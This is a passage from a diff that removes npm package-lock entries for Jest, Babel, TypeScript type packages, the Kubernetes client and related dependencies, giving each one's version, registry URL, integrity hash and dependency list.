"node_modules/@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "dependencies": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", - "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", - "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.25", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", - "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "^3.1.0", - "@jridgewell/sourcemap-codec": "^1.4.14" - } - }, - "node_modules/@jsep-plugin/assignment": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", - "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@jsep-plugin/regex": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", - "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", - "engines": { - "node": ">= 10.16.0" - }, - "peerDependencies": { - "jsep": "^0.4.0||^1.0.0" - } - }, - "node_modules/@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "dependencies": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - }, - "optionalDependencies": { - "openid-client": "^6.1.3" - } - }, - "node_modules/@kubernetes/client-node/node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/@kubernetes/client-node/node_modules/js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "dependencies": { - "argparse": "^2.0.1" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true, - "engines": { - "node": ">=14" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.5.tgz", - "integrity": "sha512-WXCyOcRtH37HAUkpXhUduaxdm82b4GSlyTqajXviN4EfiuPgNYR109xMCKvpl6zPIpua0DGlMEDCq+g8EdoheQ==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "22.10.2", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.2.tgz", - "integrity": "sha512-Xxr6BBRCAOQixvonOye19wnzyDiUtTeqldOOmj3CkeblonbccA12PFwlufvRdrpjXxqnmUaeiU5EOA+7s5diUQ==", - "dev": true, - "dependencies": { - "undici-types": "~6.20.0" - } - }, - "node_modules/@types/parse-json": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/parse-json/-/parse-json-4.0.2.tgz", - "integrity": "sha512-dISoDXWWQwUquiKsyZ4Ng+HX2KsPL7LyHKHQwgGFEA3IaKac4Obd+h2a/a6waisAoepJlBcx9paWqjA8/HVjCw==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true, - "optional": true, - "peer": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "node_modules/acorn": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/acorn/-/acorn-7.4.1.tgz", - "integrity": "sha512-nQyp0o1/mNdbTO1PO6kHkwSrmgZ0MT/jCCpNiwbUjGoRN4dlBhqJtoQuCnEOKzgTVwg0ZWiCoQy6SxMebQVh8A==", - "dev": true, - "peer": true, - "bin": { - "acorn": "bin/acorn" - }, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/acorn-jsx": { - "version": "5.3.2", - "resolved": "https://registry.npmjs.org/acorn-jsx/-/acorn-jsx-5.3.2.tgz", - "integrity": "sha512-rq9s+JNhf0IChjtDXxllJ7g41oZk5SlXtp0LHwyA5cejwn7vKmKp4pPri6YEePv2PU65sAsegbXtIinmDFDXgQ==", - "dev": true, - "peer": true, - "peerDependencies": { - "acorn": "^6.0.0 || ^7.0.0 || ^8.0.0" - } - }, - "node_modules/ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "dependencies": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/epoberezkin" - } - }, - "node_modules/ansi-colors": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/ansi-colors/-/ansi-colors-4.1.1.tgz", - "integrity": "sha512-JoX0apGbHaUJBNl6yF+p6JAFYZ666/hhCGKN5t9QFjbJQKUU/g8MNbFDbvfrgKXvI1QpZplPOnwIo99lX/AAmA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-escapes/node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/astral-regex": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/astral-regex/-/astral-regex-2.0.0.tgz", - "integrity": "sha512-Z7tMw1ytTXt5jqMcOP+OQteU1VuNK9Y02uuJtKQ1Sv69jXQKKg5cibLwGJow8yzZP+eAc18EmLGPal0bp36rvQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/async": { - "version": "3.2.5", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.5.tgz", - "integrity": "sha512-baNZyqaaLhyLVKm/DlvdW051MSgO6b8eVfIezl9E5PqWxFgzLm/wQntEW4zOytVburDEr0JlALEpdOFwvErLsg==", - "dev": true - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.23.0", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.23.0.tgz", - "integrity": 